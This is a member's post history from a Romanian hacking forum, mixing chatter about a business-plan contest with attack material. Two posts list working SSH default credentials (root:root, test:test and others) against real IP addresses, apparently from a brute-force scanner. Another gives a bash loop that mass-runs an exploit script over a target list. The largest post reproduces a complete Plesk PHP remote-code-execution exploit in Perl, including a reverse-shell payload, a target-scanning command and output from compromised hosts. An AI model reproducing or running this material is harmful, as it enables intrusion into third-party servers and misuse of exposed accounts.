-
Posts
539 -
Joined
-
Last visited
-
Days Won
4
Everything posted by Eric
-
Tare initiativa, am votat : Dev - C Programming Language si Hack - Metasploit The Penetration Testers Guide
-
Sunt de acord, dar vad asa lucrurile: un programator din romania bun nu o sa piarda timp cu astfel de concursuri deci le putem oferii si un premiu de 50-100 usd cu conditia ca programul sa fie afisat in rst power + sursa acestuia iar temele pe care o sa migreze concursul sa fie alese cu cap si ceva mai dificile, asa avem si noi si ei de castigat + statutul de trusted sau vip sau ce o mai fi.
-
Câteva îndrumări pentru tinerii de pe RST şi nu numai
Eric replied to The.Legend's topic in Off-topic
Owneru forumului nu are ce sa faca, pentru ca el nici nu exista defapt. Daca vreti schimbare incepeti sa o faceti voi, fiti voi primii oameni care fac bine iar restu o sa mearga de la sine. Curvelor ! -
Inainte de toate imi cer scuze ca nu am putut sa va raspund mai repede, dar am fost departe de tastatura. Multumesc pentru laude. Da poti participa cu mai multe proiecte, doar daca sunt foarte bune proiectele poti castiga mai multe locuri. In acelasi timp ai voie sa incadrezi 2 proiecte ( sau mai multe ) in bugetul unui proiect. Incearca sa explici cat mai multe lucruri despre afacerea ta, cu cuvintele tale restu vine de la sine. Nu suntem U.E ca sa cerem proiectele ca la carte, plus ca nu toti ne-am nascut invatati. Daca ideea ta bate proiectu poti sa castigi, un proiect cu cuvinte bine alese si o afacere proasta nu ma impresioneaza. Vreau sa fie 100% legal, nimic mai mult. In cazul tau poti sa combini proiectul cu un programator care se pricepe, si sa faceti proiectul impreuna. Nu ma intereseaza daca proiectul este al unui singur om sau fac parte mai multi oameni din proiect. Dar in astfel de cazuri vreau sa specificati in proiect treaba asta.
-
Da, poti participa, toata lumea poate participa. Poate in editia urmatoare. Dar poti incerca pe partea software. Am primit mailul tau, iti multumim pentru timpul acordat. Valabil pentru toti participantii, veti primii cateva intrebari legate de proiect, apoi se vor desemna castigatorii. Pentru necastigatori s-ar putea sa avem o surpriza. Ramane secret momentan.
-
Ce intelegem prin "nu am cunostintele necesare pentru a dezvolta un proiect" ? Ma frate, luati treaba asta prea in serios, eu vreau sa o faceti ca si cum va jucati, adica sa o faceti cu cuvintele voastre, cat mai natural, vreau sa va(ne) formam niste skilluri, nicidecum sa creem o competitie din nimic. Ganditi-va ca site-urile de metin pot castiga bani buni daca sunt gandite cum trebuie, adica productiv. Fie probabil exemplul meu cu metin este unu din exemplele proaste pentru unii si imi veti sarii in cap, eu imi voi duce ideea la bun sfarsit. Ideea de om betiv, caruia ii place sa bea, dar in acelasi timp un visator. Tin sa precizez IAR: proiectu cerut este unul fictiv, vrem sa vedem ceea ce puteti scoate din voi, adica: PUNCTELE CERUTE DE NOI SUNT FACULTATIVE DAR REPREZITA UN ATUU DACA LE PARCURGETI ! Aveti sanse egale de castig!! Sunteti mult prea lenesi si ingamfati sa va injositi pentru suma de 500$ pe care nu o puteti castiga nici macar la bingo? Multi dintre voi nu aveti bani de hosting si nici macar un buget de invesitit in cel mai penibil gand negru, sper ca sunteti constienti ca se accepta afaceri deja existente dar in falimient dar totusi cu potential, sau care merg pe un profit mult prea mic incat sa merite o alta invesitie, chiar daca voi nu dispuneti de ea, deoarece nu sunt gandite productiv, dar aici puteti gasi solutia pentru imbunatarirea lor si totodata puteti gasii ajutor si sfaturi din partea unor oameni care au castigat experienta de-a lungul timpului? De ce nu doriti sa incercati macar ? Ceea CE CEREM NOI NU ESTE GREU, TREBUIE DOAR SA INCERCATI. Imi pare rau ca m-am imbatat si trag de voi, tind sa cred ca multi dintre voi nu mai aveti nici o sansa, iar nasul incepe sa va creasca pe zi ce trece o data cu skillurile pe care aveti impresia ca " le dobanditi" . Cei ce iau treaba asta in serios, sunt mandru de voi, foarte bine, intotdeauna o sa aveti de castigat. PS: Hai, tu citirorule heiter, umple si threadu asta de offtopic !!!!!
-
DK adm:adm:2.111.153.117:DK:Næstved:Sjelland adm:adm:2.111.131.37:DK:Sorø:Sjelland AR adm:adm:196.32.94.1:AR:San Andres:Buenos Aires adm:adm:196.32.90.125:AR:Buenos Aires:Distrito Federal US adm:adm:216.127.173.75:US:Canyon Country:California adm:adm:216.127.173.76:US:Canyon Country:California NG adm:adm:41.139.102.67:NG:Lagos:Lagos adm:adm:41.139.103.67:NG:Lagos:Lagos TW adm:adm:219.87.178.49:TW:Taipei:T\'ai-pei SA adm:adm:46.184.0.88:SA:: adm:adm:46.184.10.104:SA:Jeddah:Makkah
- 55 replies
-
Eu zic sa nu umpleti forumul cu alte zeci de mii de discutii legate de acelasi scanner: https://rstforums.com/forum/55160-ssh-scanner-bruteforce-2012-a.rst
-
Inafara de TheTime, cine isi mai anunta participarea ?
-
Crezi că ești urmărit acasă, pe stradă, la servici, pe internet?
Eric replied to wirtz's topic in Stiri securitate
Ne-am trezit si am realizat ca vrem sa fim unii din cei ce implementeaza cipurile si au controlul populatiei.... -
ifconfig eth0 mtu 60000 up ceva vuln-uri ptr test?
-
CA root:root:199.195.161.42:CA:Brandon:Manitoba root:root:199.195.161.43:CA:Brandon:Manitoba IT test:test:188.135.209.82:IT:Conselice:Emilia-Romagna test:test:188.135.209.76:IT:Conselice:Emilia-Romagna US guest:guest:12.97.252.90:US:Hattiesburg:Mississippi test:test:12.97.252.90:US:Hattiesburg:Mississippi test:test:15.185.122.104:US:Palo Alto:California guest:guest:18.85.21.27:US:Cambridge:Massachusetts RO root:root:193.34.156.111:RO:Bucharest:Bucuresti root:root:195.95.152.64:RO:: test:test:109.163.230.235:RO:Bucharest:Bucuresti uupc:uupc:93.113.136.67:RO:Timisoara:Timis AU test:test:103.2.176.4:AU:: test:test:111.223.233.202:AU:: SA test:test:188.248.15.129:SA:Riyadh:Ar Riyad test:test:188.248.151.97:SA:Riyadh:Ar Riyad test:test:188.248.151.3:SA:Riyadh:Ar Riyad DO test:test:186.1.67.130:DO:Santo Domingo:Distrito Nacional test:test:186.1.67.147:DO:Santo Domingo:Distrito Nacional test:test:186.1.66.38:DO:Santo Domingo:Distrito Nacional test:test:186.1.67.15:DO:Santo Domingo:Distrito Nacional BR test:test:187.16.29.184:BR:: test:test:189.120.183.88:BR:São Paulo:Sao Paulo test:test:189.8.69.40:BR:: test:test:200.164.137.150:BR:Sobral:Ceara CN uupc:uupc:61.178.73.88:CN:Lanzhou:Gansu guest:guest:1.202.178.154:CN:Beijing:Beijing test:test:1.202.244.211:CN:Beijing:Beijing
- 55 replies
-
ceva mai complex: for IP in `cat ips.txt` ; do CONTOR=`ps aux | grep -c perl` while [ $CONTOR -ge 350 ];do CONTOR=`ps aux | grep -c perl` sleep 60 # timeout daca ajunge la procesele stabilite mai sus adica 350 done if [ $CONTOR -le 350 ]; then perl expl.pl $IP & fi done daca vrei sa si inchida procesele dupa timeout-ul stabilit de tine, mai adaugi un killall -9 perl dupa sleep adica: for IP in `cat ips.txt` ; do CONTOR=`ps aux | grep -c perl` while [ $CONTOR -ge 350 ];do CONTOR=`ps aux | grep -c perl` sleep 60 # timeout daca ajunge la procesele stabilite mai sus adica 350 killall -9 perl done if [ $CONTOR -le 350 ]; then perl expl.pl $IP & fi done
-
Astea sunt date confidentiale. ps: fara offtopic aici, multumesc!
-
Da, e un fel de kickstarter, incercam sa investim in ideile oamenilor dornici de munca dar care nu au un capital pentru inceput. Dreptul de autor revine celui ce a conceput proiectul, toate creditele i se vor oferii lui. Programatorul este platit dar trebuie sa se incadreze in suma, iar acesta nu va fi platit ca un freelancer, bineinteles eu vreau ca proiectul sa fie al programatorului iar pentru pardea de coding sa nu se arunce foarte multi bani, doar atunci cand este necesar. Dupa ce proiectul castiga si daca este unul de succes, se va finainta in continuare, asta se discuta pe parcurs, nu vreau sa fac promisiuni aiurea. In cazul in care proiectul da faliment inainte de a aduce vreun venit, imi asum pierderea. De aceea, proiectul va fi analizat, studiat si voi incerca sa iau toate pierderile in calcul, e prima editie, sper totusi sa se inscrie cati mai multi participanti si toate sa iasa bine.
-
Din profit esalonat se vor restituii banii inapoi + o parte comunitatii, pentru proiectele mici, este o suma perfecta 500$.
-
Tinand cont ca forumul a fost inchis iar majoritatea lumii si-a schimbat indentitatea, au voie toti membrii sa participe la acest concurs. Tin sa precizez ca toti banii vor fi cheltuiti justificat, si nu ii vor primii ca premii, recompense sau alte beneficii nejustificate.
-
Or sa primeasca 500$ primii trei castigatori, suma totala fiind de 1500$ Fiecare proiect va fi finantat cu cate 500$ . Bineinteles, castigatorii nu vor pleca cu 500$ in buzunar, deoarece acestia sunt banii pentru proiect, si trebuiesc cheluiti pentru proiect adica justificati. Ceea ce vreau eu sa zic este ca: daca faci parte din fericitii castigatori sa nu iti faci impresia ca iti iei cei 500$ si pleci in club sa ii spargi pe droguri.
-
Sigur, puteti trimite aici: arena.rst@hotmail.com proiectele voastre sau prin pm, editez si primul post.
-
M-am gandit sa demarez acest proiect avand in vedere experienta unor proiecte anterioare si exclusivitatea in comunitate. Vor fi premiate 3 proiecte cu cate 500$ fiecare . Acesti bani trebuiesc justificati si cheltuiti doar in cadrul proiectului. * Buget 500$ / proiect * Cerinte: 1. plan de afaceri 1.1 obiective 1.2 scop 1.3 nisa 1.4 factori de risc 2. plan de investitii 2.1 durata 2.2 parteneriate 2.3 cheltuieli - nu este obligatoriu sa atingeti toate punctele, dar as vrea sa vad ca va agitati putin si faceti un plan cat mai bine detaliat, cu cuvintele voastre. - proiectul sa fie 100% LEGAL - timpul in care se amoritizeaza investitia ( cu explicatii ) * In functie de problemele intalnite pe parcurs, regulamentul si/sau cerintele se pot modifica fara un anunt prealabil. Anexa: * coding - de specificat obligatoriu cine face aceasta parte, adica va ocupati voi de conding sau platiti pentru el. * in functie de timpul in care se amortizeaza investitia se va stabilii un procent din profit intre cele 2 parti. * comunitatea castiga un procent intre 1% si 5% in functie de suma lunara. Primele cele mai bune 3 proiecte vor castiga ! Concrsul incepe azi 05 iulie 2013 si se termina pe data de 1 august 2013. PROIECTELE LE PUTETI TRIMITE PRIN PM SAU AICI: arena.rst@hotmail.com PROIECTUL VA FI FINANTAT DOAR DACA FACE PARTE DIN MEDIUL ONLINE !!! IMPORTANT: Cei ce vor sa doneze bani pentru astfel de concursuri sunt rugati sa trimita un pm cu metoda de plata si suma disponibila. Toti banii se vor cheltuii justificat. Pana acum am primit proiect de la: - Hombre - UnUser - quantum - vasile.dickulescu - TheTime - blech - - - - - -
-
http://www.tldp.org/LDP/abs/abs-guide.pdf
-
daca nu va injurati, va purcariti si scoateti ochii tot degeaba on ? te cred ca si eu mai mint....
-
Da, genul de intrebari cu care ii dai peste nas, daca nu poti sa aticipezi sau sa iti dai seama ce a zis omu cand a folosit anumite cuvinte, inseamna ca esti mai prost ca el iar scopul tau e sa faci un post in plus, daca il iei cu teorii si cu definitii fa-o pe privat sau in alt topic, incercati in pula mea sa pastrati topicul curat, pentru ca m-am saturat sa intru intr-un thread interesat de subiect si sa vad cum faceti voi offtopic la greu. Tind sa precizez ca scanneru e public deja, si il ai deja daca intradevar contezi, macar umpic.
-
Daca as fi avut puterea, erati toti banati pana acum, de ce trebuie voi sa stricati fiecare thread al fiecareui om care vinde ceva aici ? muritor de foame sau nu... Prost e ala care da, nu ala care cere, plus ca exista o regula care zice ca nu aveti voie sa bananaiti ampulea prin threaduri decat daca sunteti interesati de produs. Intrebare: La piata faceti acelasi cacat cand vinde unu pantaloni pula in loc de puma sau njike in loc de nike in piata ? Eu cred ca da, tigani fiind, este in natura voastra de a despica firu in patru, daca sunteti asa zmei la aparate, de ce pula mea nu va faceti toti cate un thread cu acelasi scaner bindat sau hexat de 100 de ori, pana o sa se ajunga free pe aici, sau de ce pur si simplu nu il publicati sa il ia tot prostu si sa-l tina colectie in pc???
-
Plesk Apache zeroday / June 2013 discovered & exploited by kingcope this Plesk configuration setting makes it possible: scriptAlias /phppath/ "/usr/bin/" Furthermore this is not cve-2012-1823 because the php interpreter is called directly. (no php file is called) Parallels Plesk Remote Exploit -- PHP Code Execution and therefore Command Execution Affected and tested: Plesk 9.5.4 Plesk 9.3 Plesk 9.2 Plesk 9.0 Plesk 8.6 Discovered & Exploited by Kingcope / June 2013 Affected and tested OS: RedHat, CentOS, Fedora Affected and tested Platforms: Linux i386, Linux x86_64 Untested OS: Windows (php.exe?) Unaffected: 11.0.9 due to compiled in protection of PHP version Traces in /var/log/httpd/access_log: 192.168.74.142 - - [19/Mar/2013:18:59:41 +0100] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69% 6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61% 62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65% 3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 200 203 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" Shodanhq overview of Plesk on Linux: SHODAN - Computer Search Engine perl plesk-simple.pl <ip address> ... ... ... OK Linux ip.unsecure.net 2.6.18-028stab101.1 #1 SMP Sun Jun 24 19:50:48 MSD 2012 i686 i686 i386 GNU/Linux uid=48(apache) gid=48(apache) groups=48(apache),2521(psaserv) --- ./pnscan -w"GET /phppath/php HTTP/1.0\r\n\r\n" -r "500 Internal" 76.12.54.163/16 80 perl plesk-simple.pl 76.12.81.206 HTTP/1.1 200 OK Date: Sat, 16 Mar 2013 13:39:35 GMT Server: Apache/2.2.3 (CentOS) Connection: close Transfer-Encoding: chunked Content-Type: text/html 77 Linux 114114.unsecureweb.com 2.6.18-308.24.1.el5 #1 SMP Tue Dec 4 17:43:34 E ST 2012 x86_64 x86_64 x86_64 GNU/Linux 3e uid=48(apache) gid=48(apache) groups=48(apache),2521(psaserv) 0 perl plesk-simple-ssl.pl <ip> (use HTTPS because HTTP gave an internal server error) HTTP/1.1 200 OK Date: Tue, 19 Mar 2013 15:29:28 GMT Server: Apache/2.0.54 (Fedora) Connection: close Transfer-Encoding: chunked Content-Type: text/html 3 OK 60 Linux UC Davis: Welcome to UC Davis 2.6.17-1.2142_FC4 #1 Tue Jul 11 22:41:14 EDT 2006 i686 i686 i386 GNU/Linux 4c uid=48(apache) gid=48(apache) groups=48(apache),500(webadmin),2522(psaserv) 0 use IO::Socket; use URI::Escape; $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => 80, Proto => 'tcp'); $pwn = '<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?>'; $arguments = uri_escape("-d","\0-\377"). "+" . uri_escape("allow_url_include=on","\0-\377"). "+" . uri_escape("-d","\0-\377"). "+" . uri_escape("safe_mode=off","\0-\377"). "+" . uri_escape("-d","\0-\377"). "+" . uri_escape("suhosin.simulation=on","\0-\377"). "+" . uri_escape("-d","\0-\377"). "+" . uri_escape("disable_functions=\"\"","\0-\377"). "+" . uri_escape("-d","\0-\377"). "+" . uri_escape("open_basedir=none","\0-\377"). "+" . uri_escape("-d","\0-\377"). "+" . uri_escape("auto_prepend_file=php://input","\0-\377"). "+" . uri_escape("-n","\0-\377"); $path = uri_escape("phppath","\0-\377") . "/" . uri_escape("php","\0-\377"); print $sock "POST /$path?$arguments HTTP/1.1\r\n" ."Host: $ARGV[0]\r\n" ."Content-Type: application/x-www-form-urlencoded\r\n" ."Content-Length: ". length($pwn) ."\r\n\r\n" . $pwn; while(<$sock>) { print; } use IO::Socket::SSL; use URI::Escape; $sock = IO::Socket::SSL->new(PeerAddr => $ARGV[0], PeerPort => 443, Proto => 'tcp'); $pwn = '<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?>'; $arguments = uri_escape("-d","\0-\377"). "+" . uri_escape("allow_url_include=on","\0-\377"). "+" . uri_escape("-d","\0-\377"). "+" . uri_escape("safe_mode=off","\0-\377"). "+" . uri_escape("-d","\0-\377"). "+" . uri_escape("suhosin.simulation=on","\0-\377"). "+" . uri_escape("-d","\0-\377"). "+" . uri_escape("disable_functions=\"\"","\0-\377"). "+" . uri_escape("-d","\0-\377"). "+" . uri_escape("open_basedir=none","\0-\377"). "+" . uri_escape("-d","\0-\377"). "+" . uri_escape("auto_prepend_file=php://input","\0-\377"). "+" . uri_escape("-n","\0-\377"); $path = uri_escape("phppath","\0-\377") . "/" . uri_escape("php","\0-\377"); print $sock "POST /$path?$arguments HTTP/1.1\r\n" ."Host: $ARGV[0]\r\n" ."Content-Type: application/x-www-form-urlencoded\r\n" ."Content-Length: ". length($pwn) ."\r\n\r\n" . $pwn; while(<$sock>) { print; } #CentOS/Redhat Linux: yum install perl-IO-Socket-SSL.noarch ############################################################################################################### plesk-simple-ssl.pl #plesk remote exploit by kingcope #all your base belongs to me :> use IO::Socket::SSL; use URI::Escape; $sock = IO::Socket::SSL->new(PeerAddr => $ARGV[0], PeerPort => 443, Proto => 'tcp'); $pwn = '<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?>'; $arguments = uri_escape("-d","\0-\377"). "+" . uri_escape("allow_url_include=on","\0-\377"). "+" . uri_escape("-d","\0-\377"). "+" . uri_escape("safe_mode=off","\0-\377"). "+" . uri_escape("-d","\0-\377"). "+" . uri_escape("suhosin.simulation=on","\0-\377"). "+" . uri_escape("-d","\0-\377"). "+" . uri_escape("disable_functions=\"\"","\0-\377"). "+" . uri_escape("-d","\0-\377"). "+" . uri_escape("open_basedir=none","\0-\377"). "+" . uri_escape("-d","\0-\377"). "+" . uri_escape("auto_prepend_file=php://input","\0-\377"). "+" . uri_escape("-n","\0-\377"); $path = uri_escape("phppath","\0-\377") . "/" . uri_escape("php","\0-\377"); print $sock "POST /$path?$arguments HTTP/1.1\r\n" ."Host: $ARGV[0]\r\n" ."User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n" ."Content-Type: application/x-www-form-urlencoded\r\n" ."Content-Length: ". length($pwn) ."\r\n\r\n" . $pwn; while(<$sock>) { print; } #CentOS/Redhat Linux: yum install perl-IO-Socket-SSL.noarch ############################################################################################################### plesk-simple.pl #plesk remote exploit by kingcope #all your base belongs to me :> use IO::Socket; use URI::Escape; $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => 80, Proto => 'tcp'); $pwn = '<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?>'; $arguments = uri_escape("-d","\0-\377"). "+" . uri_escape("allow_url_include=on","\0-\377"). "+" . uri_escape("-d","\0-\377"). "+" . uri_escape("safe_mode=off","\0-\377"). "+" . uri_escape("-d","\0-\377"). "+" . uri_escape("suhosin.simulation=on","\0-\377"). "+" . uri_escape("-d","\0-\377"). "+" . uri_escape("disable_functions=\"\"","\0-\377"). "+" . uri_escape("-d","\0-\377"). "+" . uri_escape("open_basedir=none","\0-\377"). "+" . uri_escape("-d","\0-\377"). "+" . uri_escape("auto_prepend_file=php://input","\0-\377"). "+" . uri_escape("-n","\0-\377"); $path = uri_escape("phppath","\0-\377") . "/" . uri_escape("php","\0-\377"); print $sock "POST /$path?$arguments HTTP/1.1\r\n" ."Host: $ARGV[0]\r\n" ."User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n" ."Content-Type: application/x-www-form-urlencoded\r\n" ."Content-Length: ". length($pwn) ."\r\n\r\n" . $pwn; while(<$sock>) { print; } ############################################################################################################### plesk.pl #plesk remote exploit by kingcope #all your base belongs to me :> use IO::Socket; use IO::Socket::SSL; use URI::Escape; sub usage { print "usage: $0 <target> <http/https> <local_ip> <local_port>\n";exit; } if (!defined($ARGV[3])){usage();} $target=$ARGV[0]; $proto=$ARGV[1]; if ($proto eq "http") { $sock = IO::Socket::INET->new( PeerAddr => $ARGV[0], PeerPort => 80, Proto => 'tcp'); }elsif ($proto eq "https") { $sock = IO::Socket::SSL->new( PeerAddr => $ARGV[0], PeerPort => 443, Proto => 'tcp'); }else {usage();} $lip=$ARGV[2]; $lport=$ARGV[3]; $pwn="<?php echo \"Content-Type: text/plain\r\n\r\n\";set_time_limit (0); \$VERSION = \"1.0\"; \$ip = '$lip'; \$port = $lport; \$chunk_size = 1400; \$write_a = null; \$error_a = null; \$shell = '/bin/sh -i'; \$daemon = 0;\$debug = 0; if (function_exists('pcntl_fork')) { \$pid = pcntl_fork(); if (\$pid == -1) { printit(\"ERROR: Can't fork\"); exit(1);} if (\$pid) { exit(0);} if (posix_setsid() == -1) { printit(\"Error: Can't setsid()\"); exit(1); } \$daemon = 1;} else { printit(\"WARNING: Failed to daemonise. This is quite common and not fatal.\");}chdir(\"/\"); umask(0); \$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30);if (!\$sock) { printit(\"\$errstr (\$errno)\"); exit(1);} \$descriptorspec = array(0 => array(\"pipe\", \"r\"),1 => array(\"pipe\", \"w\"), 2 => array(\"pipe\", \"w\"));\$process = proc_open(\$shell, \$descriptorspec, \$pipes);if (!is_resource(\$process)) { printit(\"ERROR: Can't spawn shell\"); exit(1);}stream_set_blocking(\$pipes[0], 0);stream_set_blocking(\$pipes[1], 0);stream_set_blocking(\$pipes[2], 0);stream_set_blocking(\$sock, 0);while (1) { if (feof(\$sock)) { printit(\"done.\"); break;} if (feof(\$pipes[1])) {printit(\"done.\");break;}\$read_a = array(\$sock, \$pipes[1], \$pipes[2]);\$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);if (in_array(\$sock, \$read_a)) {if (\$debug) printit(\"SOCK READ\");\$input = fread(\$sock, \$chunk_size);if(\$debug) printit(\"SOCK: \$input\");fwrite(\$pipes[0], \$input);}if (in_array(\$pipes[1], \$read_a)) {if (\$debug) printit(\"STDOUT READ\");\$input = fread(\$pipes[1], \$chunk_size);if (\$debug) printit(\"STDOUT: \$input\");fwrite(\$sock, \$input);}if (in_array(\$pipes[2], \$read_a)) {if (\$debug) printit(\"STDERR READ\");\$input = fread(\$pipes[2], \$chunk_size); if (\$debug) printit(\"STDERR: \$input\");fwrite(\$sock, \$input);}}fclose(\$sock);fclose(\$pipes[0]);fclose(\$pipes[1]);fclose(\$pipes[2]);proc_close(\$process);function printit (\$string) {if (!\$daemon) {print \"\$string\n\";}} ?>"; $arguments=uri_escape("-d","\0-\377"). "+" . uri_escape("allow_url_include=on","\0-\377"). "+" . uri_escape("-d","\0-\377"). "+" . uri_escape("safe_mode=off","\0-\377"). "+" . uri_escape("-d","\0-\377"). "+" . uri_escape("suhosin.simulation=on","\0-\377"). "+" . uri_escape("-d","\0-\377"). "+" . uri_escape("disable_functions=\"\"","\0-\377"). "+" . uri_escape("-d","\0-\377"). "+" . uri_escape("open_basedir=none","\0-\377"). "+" . uri_escape("-d","\0-\377"). "+" . uri_escape("auto_prepend_file=php://input","\0-\377"). "+" . uri_escape("-n","\0-\377"); $path=uri_escape("phppath","\0-\377"). "/" . uri_escape("php","\0-\377"); print $sock "POST /$path?$arguments HTTP/1.1\r\n". "Host: $ARGV[0]\r\n". "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n". "Content-Type: text/plain\r\n". "Content-Length: ". length($pwn) ."\r\n\r\n". $pwn; while(<$sock>){print $_;}; ############################################################################################################### source: Plesk Apache Zeroday Remote Exploit